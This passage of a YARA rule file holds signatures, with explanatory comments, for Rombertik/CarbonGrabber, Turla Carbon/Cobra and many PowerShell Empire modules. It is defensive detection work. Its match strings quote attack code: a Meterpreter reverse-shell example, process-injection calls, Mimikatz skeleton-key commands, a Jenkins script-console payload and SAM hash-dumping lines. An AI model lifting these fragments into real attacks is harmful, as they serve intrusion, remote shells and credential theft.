hash = "b50ecc0ba3d6ec19b53efe505d14276e9e71285f"   // SHA-1
id = "3233c139-ac06-576c-9870-51306d5aa385"
strings:
$s0 = "c:\\users\\iden\\documents\\visual studio 2010\\Projects\\FormGrabberBuilderC++" ascii   // build path left in the binary
$s1 = "Host(www.panel.com): " fullword ascii         // prompt: C2 host
$s2 = "Path(/form/index.php?a=insert): " fullword ascii   // prompt: panel insert endpoint
$s3 = "FileName: " fullword ascii
$s4 = "~Rich8" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 35KB and all of them
}
// CarbonGrabber / Rombertik stub (Server.exe) produced by the builder. Most
// of the strings are individually generic (svchost path, RunOnce key,
// browser names, Ws2_32.dll, a Chrome user agent); the rule compensates by
// requiring 8 of 11 in an MZ file under 250 KB. The `&post=` / `&host=` /
// `&browser=` fragments are the form-grabber's exfil parameters, matching the
// `logs` columns in the panel rules. Not Turla tooling.
rule Rombertik_CarbonGrabber_Builder_Server {
meta:
description = "Detects CarbonGrabber alias Rombertik Builder Server - file Server.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blogs.cisco.com/security/talos/rombertik"
date = "2015-05-05"
hash = "895fab8d55882eac51d4b27a188aa67205ff0ae5"   // SHA-1
id = "742003a2-3716-5ad9-a720-b9e2be71554a"
strings:
$s0 = "C:\\WINDOWS\\system32\\svchost.exe" fullword ascii
$s3 = "Software\\Microsoft\\Windows\\Currentversion\\RunOnce" fullword ascii   // persistence key
$s4 = "chrome.exe" fullword ascii
$s5 = "firefox.exe" fullword ascii
$s6 = "chrome.dll" fullword ascii
$s7 = "@KERNEL32.DLL" fullword wide
$s8 = "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome" ascii   // truncated UA; not fullword
$s10 = "&post=" fullword ascii
$s11 = "&host=" fullword ascii
$s12 = "Ws2_32.dll" fullword ascii
$s16 = "&browser=" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 250KB and 8 of them
}
// Turla Carbon/Cobra as seen in the RUAG breach report. Single-indicator
// rule: an MZ file containing the "\Cobra\Release\Cobra.pdb" path fragment.
// A PDB path is trivially removed or changed by a rebuild, hence score 60;
// there is no filesize cap. Also matches any other file that embeds the
// string (e.g. an analysis report saved as a PE — unlikely, but possible).
rule RUAG_Cobra_Malware {
meta:
description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/N5MEj0"
score = 60
id = "dd2d591f-6f56-5c31-9f3c-3aa7d174c9a0"
strings:
$s1 = "\\Cobra\\Release\\Cobra.pdb" ascii   // not fullword: a longer path containing this also matches
condition:
uint16(0) == 0x5a4d and $s1
}
// Turla Carbon (ESET, Mar 2017) — generic rule from ESET's malware-ioc repo.
// An MZ file must contain "ModStart" AND one of the two "STOP|..." tokens.
// There is only one $s string, so `1 of ($s*)` is simply `$s1`. No modifiers:
// ascii only. No filesize cap.
rule generic_carbon
{
meta:
author = "ESET Research"
date = "2017-03-30"
description = "Turla Carbon malware"
reference = "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/"
source = "https://github.com/eset/malware-ioc/"
contact = "github@eset.com"
license = "BSD 2-Clause"
id = "efdc0d16-a974-5c00-a401-391d60f3081e"
strings:
$s1 = "ModStart"     // short and generic on its own; the $t tokens provide the specificity
$t1 = "STOP|OK"
$t2 = "STOP|KILL"
condition:
(uint16(0) == 0x5a4d) and (1 of ($s*)) and (1 of ($t*))
}
// Turla Carbon (ESET, Mar 2017): matches on VERSIONINFO alone. Requires
// `import "pe"`; there is no MZ check, but for non-PE input the version_info
// lookups are undefined and the expression evaluates to false.
// Both tests use `contains`, so any InternalName that merely includes one of
// the three substrings qualifies. The CompanyName string is attacker-written
// metadata, not a verified signature — it is the impersonation being detected,
// and it is no proof of a genuine Microsoft file.
rule carbon_metadata
{
meta:
author = "ESET Research"
date = "2017-03-30"
description = "Turla Carbon malware"
reference = "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/"
source = "https://github.com/eset/malware-ioc/"
contact = "github@eset.com"
license = "BSD 2-Clause"
id = "976b6a7d-00bf-5d0f-baf9-84fc5dbd21a2"
condition:
(pe.version_info["InternalName"] contains "SERVICE.EXE" or
pe.version_info["InternalName"] contains "MSIMGHLP.DLL" or   // lookalikes of Microsoft DLL names
pe.version_info["InternalName"] contains "MSXIML.DLL")
and pe.version_info["CompanyName"] contains "Microsoft Corporation"
}
// PowerShell Empire: Invoke-BypassUAC.ps1 source. Matches the script text
// (DLL-patching and remote-write steps); 3 of 4 lines in a file under 1.2 MB.
// No file-type anchor, so obfuscated or minified copies that change these
// exact lines are missed. Empire is public tooling used by many actors.
rule Empire_Invoke_BypassUAC {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "ab0f900a6915b7497313977871a64c3658f3e6f73f11b03d2d33ca61305dc6a8"
id = "8454d929-e184-5be1-b61f-4dfa8f44bdda"
strings:
$s1 = "$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
$s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii   // hidden host process for the injection
$s3 = "$Payload = Invoke-PatchDll -DllBytes $Payload -FindString \"ExitThread\" -ReplaceString \"ExitProcess\"" fullword ascii
$s4 = "$temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)" fullword ascii
condition:
filesize < 1200KB and 3 of them
}
// PowerShell Empire: the Python module lib/modules/trollsploit/message.py
// (pops a fake error dialog on the target). Matches the module's Python
// source — 3 of 4 lines in a file under 10 KB. Server-side artefact, so hits
// indicate an Empire installation rather than a victim host.
rule Empire_lib_modules_trollsploit_message {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file message.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "71f2258177eb16eafabb110a9333faab30edacf67cb019d5eab3c12d095655d5"
id = "cb0eee5a-c236-512e-8256-7411a7fb1fd5"
strings:
$s1 = "script += \" -\" + str(option) + \" \\\"\" + str(values['Value'].strip(\"\\\"\")) + \"\\\"\"" fullword ascii
$s2 = "if option.lower() != \"agent\" and option.lower() != \"computername\":" fullword ascii
$s3 = "[String] $Title = 'ERROR - 0xA801B720'" fullword ascii          // default dialog title
$s4 = "'Value' : 'Lost contact with the Domain Controller.'" fullword ascii   // default dialog text
condition:
filesize < 10KB and 3 of them
}
// PowerShell Empire / PowerSploit: Persistence.psm1 source. Any ONE of the
// three lines in a file under 108 KB fires; $s1 is the Add-Persistence help
// example, $s2 a comment, $s3 the script-template substitution. Expect hits
// on legitimately installed PowerSploit copies as well.
rule Empire_Persistence {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Persistence.psm1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "ae8875f7fcb8b4de5cf9721a9f5a9f7782f7c436c86422060ecdc5181e31092f"
id = "0f63b5f4-f933-5821-b0b0-50717e75f6d9"
strings:
$s1 = "C:\\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -V" ascii   // truncated; not fullword
$s2 = "# Execute the following to remove the user-level persistent payload" fullword ascii
$s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")" fullword ascii
condition:
filesize < 108KB and 1 of them
}
// PowerShell Empire: the portscan.py module (server-side Python that builds
// an Invoke-PortScan command line). Both lines required, file under 14 KB.
rule Empire_portscan {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file portscan.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "b355efa1e7b3681b1402e22c58ce968795ef245fd08a0afb948d45c173e60b97"
id = "23a0f769-9155-5aa0-9200-2baf827bdda4"
strings:
$s1 = "script += \"Invoke-PortScan -noProgressMeter -f\"" fullword ascii
$s2 = "script += \" | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-Str" ascii   // truncated; not fullword
condition:
filesize < 14KB and all of them
}
// PowerShell Empire / PowerSploit: Invoke-Shellcode.ps1 source. Any ONE line
// in a file under 100 KB fires: the help example ($s1), the injection
// message ($s2), or the VirtualAllocEx call ($s3 — the literal's own comment
// spells out 0x3000/0x40 as Reserve|Commit, RWX). Script text only; the
// shellcode itself is not matched.
rule Empire_Invoke_Shellcode {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
id = "41788f71-cc99-50b3-bdc7-17b132ab2767"
strings:
$s1 = "C:\\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbos" ascii   // truncated; not fullword
$s2 = "\"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )" fullword ascii
$s3 = "$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)" fullword ascii
condition:
filesize < 100KB and 1 of them
}
// PowerShell Empire / PowerSploit: Write-HijackDll.ps1 source, which embeds
// a DLL as base64. $s2 starts with "TVqQAAMAAAAEAAAA//8AAL" — the base64 of
// an MZ header — so it is a strong indicator of an embedded PE. 2 of 3 lines
// in a file under 500 KB.
rule Empire_Write_HijackDll {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "155fa7168e28f15bb34f67344f47234a866e2c63b3303422ff977540623c70bf"
id = "6a80af21-fb01-5996-b14d-44ff55b7fb3e"
strings:
$s1 = "$DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString \"debug.bat\" -ReplaceString $BatchPath" fullword ascii
$s2 = "$DllBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw" ascii   // base64 PE header prefix; not fullword
$s3 = "[Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)" fullword ascii
condition:
filesize < 500KB and 2 of them
}
// PowerShell Empire: the skeleton_key.py module (wraps Invoke-Mimikatz
// misc::skeleton, which patches LSASS on a domain controller so the password
// "mimikatz" authenticates any account). Matches the module's Python source —
// 2 of 4 lines in a file under 6 KB. Server-side artefact.
rule Empire_skeleton_key {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file skeleton_key.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "3d02f16dcc38faaf5e97e4c5dbddf761f2816004775e6af8826cde9e29bb750f"
id = "d508e09e-13e8-5866-bb5b-0d886f960bb5"
strings:
$s1 = "script += \"Invoke-Mimikatz -Command '\\\"\" + command + \"\\\"';\"" fullword ascii
$s2 = "script += '\"Skeleton key implanted. Use password \\'mimikatz\\' for access.\"'" fullword ascii
$s3 = "command = \"misc::skeleton\"" fullword ascii
$s4 = "\"ONLY APPLICABLE ON DOMAIN CONTROLLERS!\")," fullword ascii
condition:
filesize < 6KB and 2 of them
}
// PowerShell Empire: the invoke_wmi.py lateral-movement module. $s1 is the
// credential-store tuple unpacking, $s3 the generated PowerShell that builds
// a PSCredential from a plain-text password. 2 of 3 lines, file under 20 KB.
// Server-side Python, so hits point at an Empire install.
rule Empire_invoke_wmi {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file invoke_wmi.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "a914cb227f652734a91d3d39745ceeacaef7a8b5e89c1beedfd6d5f9b4615a1d"
id = "1e1d1e71-6ea9-500a-b8b8-c48a64bc2b54"
strings:
$s1 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
$s2 = "script += \";'Invoke-Wmi executed on \" +computerNames +\"'\"" fullword ascii
$s3 = "script = \"$PSPassword = \\\"\"+password+\"\\\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Man" ascii   // truncated; not fullword
condition:
filesize < 20KB and 2 of them
}
// PowerShell Empire: Invoke-MetasploitPayload.ps1 (runs a download cradle
// in a 32-bit powershell.exe). uint16 is little-endian, so 0x7566 means the
// file starts with the bytes "fu" — i.e. "function ..." — in which case one
// line suffices under 9 KB; otherwise both lines are required at any size.
rule Empire_Invoke_MetasploitPayload {
meta:
description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
id = "608c30b0-826a-55b1-afb8-756b476d6b55"
strings:
$s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii
$s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii   // explicit WoW64 PowerShell
condition:
( uint16(0) == 0x7566 and filesize < 9KB and 1 of them ) or all of them
}
// PowerShell Empire: Exploit-Jenkins.ps1, which POSTs a Groovy
// `println new ProcessBuilder(...)` to an unauthenticated Jenkins /script
// console. 0x6620 little-endian is the byte pair 0x20 0x66 (" f"), so the
// short-file branch applies when the script starts with a space then "f";
// otherwise all three lines are required.
rule Empire_Exploit_Jenkins {
meta:
description = "Detects Empire component - file Exploit-Jenkins.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
id = "f2162783-34cd-5db4-bd1c-6c58feb92e77"
strings:
$s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii   // URL-encoded Groovy payload; not fullword
$s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii   // Jenkins script console endpoint
$s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii
condition:
( uint16(0) == 0x6620 and filesize < 7KB and 1 of them ) or all of them
}
// PowerShell Empire / PowerSploit: Get-SecurityPackages.ps1 (enumerates SSPs
// via reflection-built SSPI enums). 0x7566 == leading bytes "fu" ("function"):
// then one line under 20 KB suffices; otherwise both lines.
rule Empire_Get_SecurityPackages {
meta:
description = "Detects Empire component - file Get-SecurityPackages.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
id = "a109eda1-a26d-5cf6-b6b5-1a1a1e770a0a"
strings:
$s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii
$s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
}
// PowerShell Empire: Invoke-PowerDump.ps1 (SAM hash dumping — bootkey, RC4
// per-RID key, LM/NT hash decryption). 0x2023 little-endian is "# ", i.e. a
// script that opens with a comment line; then one of the three lines under
// 60 KB suffices, otherwise all three are required.
rule Empire_Invoke_PowerDump {
meta:
description = "Detects Empire component - file Invoke-PowerDump.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
id = "d1082a4e-d458-57fb-b332-7c775c8ef2dd"
strings:
$x16 = "$enc = Get-PostHashdumpScript" fullword ascii
$x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii
$x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii   // SAM per-user RC4 key derivation
condition:
( uint16(0) == 0x2023 and filesize < 60KB and 1 of them ) or all of them
}
// PowerShell Empire / PowerSploit: Install-SSP.ps1, whose help example
// installs mimilib.dll as a Security Support Provider (credential capture at
// logon). Single string, so `all of them` and `1 of them` are the same test;
// the only difference between the two branches is the "fu" header check and
// the 20 KB cap.
rule Empire_Install_SSP {
meta:
description = "Detects Empire component - file Install-SSP.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
id = "06bbdcc5-c48b-5753-88a2-5c962d1b986f"
strings:
$s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
}
// Empire's Invoke-ShellcodeMSIL.ps1: executes shellcode by overwriting a JIT-compiled .NET
// method. $s2/$s3 are byte-array literals from the script; $s4 is the trigger call.
rule Empire_Invoke_ShellcodeMSIL {
    meta:
        description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
        id = "06011b51-bad7-5656-ac37-e49f9b6d0498"
    strings:
        $s1 = "$FinalShellcode.Length" fullword ascii
        $s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii
        $s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii
        $s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii
    condition:
        // Either every string is present, or any one of them is present in a small file
        // whose first two bytes are "fu" (little-endian 0x7566, e.g. "function").
        all of them
        or ( filesize < 30KB and uint16(0) == 0x7566 and any of them )
}
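// Empire's PowerUp.ps1 (privilege-escalation enumeration). Only one string is defined, so
// the original condition
//   ( uint16(0) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
// was equivalent to "$x2" on its own: "all of them" fires on the single string, so the
// magic-byte ("<#") and filesize guard could never restrict anything. The rewritten
// condition matches exactly the same files and no longer suggests a guard that is not
// enforced; to actually enforce it, AND it with $x2 instead.
rule HKTL_Empire_PowerUp {
    meta:
        description = "Detects Empire component - file PowerUp.ps1"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
        id = "e79d093e-7481-52a3-a350-4d1b6d8955cd"
    strings:
        // Command PowerUp uses to enumerate IIS application-pool credentials via appcmd.exe.
        $x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii
    condition:
        $x2
}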
// Empire's Get-GPPPassword.ps1: recovers Group Policy Preferences passwords from SYSVOL.
// Strings cover the cpassword base64 decode, the SYSVOL enumeration and the helper name.
rule Empire_Get_GPPPassword {
    meta:
        description = "Detects Empire component - file Get-GPPPassword.ps1"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
        id = "7791b009-19d3-5d08-8ef7-4723d28830ed"
    strings:
        $s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii
        $s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
        $s3 = "function Get-DecryptedCpassword {" fullword ascii
    condition:
        // All three strings match unconditionally; one string is enough for a small file
        // that begins with "fu" (little-endian 0x7566, e.g. "function").
        ( $s1 and $s2 and $s3 )
        or ( filesize < 30KB and uint16(0) == 0x7566 and any of them )
}
// Empire's Invoke-SmbScanner.ps1: tests credentials against SMB hosts. $s1 is its
// reachability ping, $s2 the result-object field that carries the tried password.
rule Empire_Invoke_SmbScanner {
    meta:
        description = "Detects Empire component - file Invoke-SmbScanner.ps1"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
        id = "63cd048b-04fd-5b4f-9d4d-3a001c31b4df"
    strings:
        $s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii
        $s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii
    condition:
        // Both strings match on their own; a single one is enough only for a file under
        // 10KB whose first two bytes are "fu" (little-endian 0x7566, e.g. "function").
        ( $s1 and $s2 )
        or ( filesize < 10KB and uint16(0) == 0x7566 and any of them )
}
// Empire's Exploit-JBoss.ps1: deploys a WAR through the JBoss JMX console. Strings cover
// the function name, URL construction, the JMX invokeOp path, the author URL and help text.
rule Empire_Exploit_JBoss {
    meta:
        description = "Detects Empire component - file Exploit-JBoss.ps1"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
        id = "a9c75cf5-9469-5a45-b750-69728ed0069f"
    strings:
        $s1 = "Exploit-JBoss" fullword ascii
        $s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
        $s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
        $s4 = "http://blog.rvrsh3ll.net" fullword ascii
        $s5 = "Remote URL to your own WARFile to deploy." fullword ascii
    condition:
        // Every string present matches unconditionally; note that $s1 alone ("Exploit-JBoss")
        // is a weak indicator, which is why the single-string path is gated on a small file
        // starting with "fu" (little-endian 0x7566, e.g. "function").
        all of them
        or ( filesize < 10KB and uint16(0) == 0x7566 and any of them )
}
// Empire's dumpCredStore.ps1: reads the Windows Credential Manager via CredReadW.
// $x1 is the P/Invoke declaration, $s12 the error message, $s15 the C# call site.
rule Empire_dumpCredStore {
    meta:
        description = "Detects Empire component - file dumpCredStore.ps1"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
        id = "cdb87ed4-fa90-5724-b37d-97cf8e4b8326"
    strings:
        $x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
        $s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii
        $s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii
    condition:
        // All three strings match unconditionally; any one of them is enough for a file
        // under 40KB whose first two bytes are "<#" (little-endian 0x233c, a PowerShell
        // block-comment opener).
        ( $x1 and $s12 and $s15 )
        or ( filesize < 40KB and uint16(0) == 0x233c and any of them )
}
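// Empire's Invoke-EgressCheck.ps1: probes outbound ports to find allowed egress paths.
// Only one string is defined, so the original condition
//   ( uint16(0) == 0x233c and filesize < 10KB and 1 of them ) or all of them
// reduced to "$s1": "all of them" is satisfied by the single string, so the "<#" magic
// and filesize guard never constrained a match. The condition below matches the same
// files and states that plainly; AND the guard with $s1 if the restriction is desired.
rule Empire_Invoke_EgressCheck {
    meta:
        description = "Detects Empire component - file Invoke-EgressCheck.ps1"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
        id = "21e09250-6853-5743-a6ef-aa6be8091d33"
    strings:
        // The script's internal call that performs one egress probe.
        $s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii
    condition:
        $s1
}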